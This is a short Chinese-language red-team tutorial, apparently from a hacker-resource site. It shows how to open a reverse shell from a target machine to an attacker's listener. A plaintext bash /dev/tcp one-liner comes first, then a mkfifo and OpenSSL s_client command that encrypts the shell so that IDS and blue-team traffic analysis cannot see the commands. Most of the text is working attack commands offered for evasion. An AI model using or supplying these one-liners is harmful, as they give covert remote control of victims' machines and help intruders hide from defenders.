Openssl流量加密

流量加密

使用Openssl反弹加密shell

如果反弹shell都是明文传输,当内网有IDS或者防护软件就会进行流量分析,攻击特征很快被发现。

如果蓝队对攻击流量回溯分析,就可以复现攻击的过程,此时红队攻击就会被暴露出来。

使用wireshark抓包直接看到输入的命令和返回信息进行混淆或加密。

未加密传输

攻击机:192.168.31.217

目标机:192.168.152.130

攻击机执行命令

nc -l 8080 
Openssl流量加密

目标机(kali)执行命令

bash -i >& /dev/tcp/192.168.31.217/8080 0>&1 

Openssl流量加密
反弹成功

Openssl流量加密
随意输入两个命令,再去wireshark内分析流量

id cat /etc/passwd 

Openssl流量加密
到wireshark内,找到流量包进行分析

可以看到执行的命令被抓取,这些都会被报警,攻击就会暴露,所以就需要采用加密传输

Openssl流量加密

OpenSSL传输加密

OpenSSL是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听并确认另一端连接者的身份

攻击机上 OpenSSL 生成证书自签名证书(rsa加密)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 
Openssl流量加密

开启监听

openssl s_server -quiet -key key.pem -cert cert.pem -port 8088 
Openssl流量加密

目标机上执行命令

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 攻击机IP:端口> /tmp/s; rm /tmp/s 
Openssl流量加密

反弹成功

Openssl流量加密

随意输入命令,再通过wireshark抓包,成功加密

Openssl流量加密 Openssl流量加密

版权声明:玥玥 发表于 2021-05-05 19:32:10。
转载请注明:Openssl流量加密 | 女黑客导航